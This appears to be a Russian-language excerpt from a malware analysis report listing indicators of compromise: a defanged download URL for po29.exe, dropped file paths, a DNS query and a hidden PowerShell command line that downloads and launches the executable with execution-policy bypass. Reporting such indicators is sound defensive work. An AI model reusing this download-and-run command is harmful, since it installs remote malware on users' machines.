Техническая информация
- http://bo##teel.us/po29.exe как %appdata%\po29.exe
- %TEMP%\abctfhghghghghž.sct
- http://bo##teel.us/po29.exe
- DNS ASK bo##teel.us
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://bo##teel.us/po29.exe','%APPDATA%\po29.exe');Start-Process '%APPDATA%\p...' (со скрытым окном)